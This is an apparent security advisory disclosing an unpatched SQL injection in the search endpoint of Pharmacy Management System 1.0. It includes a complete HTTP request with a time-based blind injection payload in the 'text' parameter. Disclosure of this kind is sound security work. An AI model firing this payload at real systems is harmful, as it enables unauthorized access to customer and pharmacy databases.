- Pharmacy Management System: 1.0
- Vulnerability Type: SQL Injection
- Severity: CRITICAL
- Status: Unpatched
/php/manage_customer.php?action=search&text=a
A critical SQL injection vulnerability was identified in the Pharmacy Management System version 1.0. The issue can be exploited through the text parameter sent via a GET request to the endpoint /php/manage_customer.php?action=search&text=a. Attackers can manipulate this parameter to execute arbitrary SQL commands, allowing unauthorized access and compromising the security of the database.
Exploiting this vulnerability can expose sensitive information and disrupt system operations. Since no patch is currently available, this flaw remains critical and demands immediate attention.
Below is an example of a GET request that demonstrates how the SQL injection vulnerability can be exploited by altering the text parameter:
GET /php/manage_customer.php?action=search&text=a%25'%20AND%20(SELECT%209276%20FROM%20(SELECT(SLEEP(5)))rrau)%20AND%20'gdwz%25'%3d'gdwz HTTP/1.1
Host: localhost:8080
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
sec-ch-ua-mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/manage_customer.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f;
Connection: keep-alive
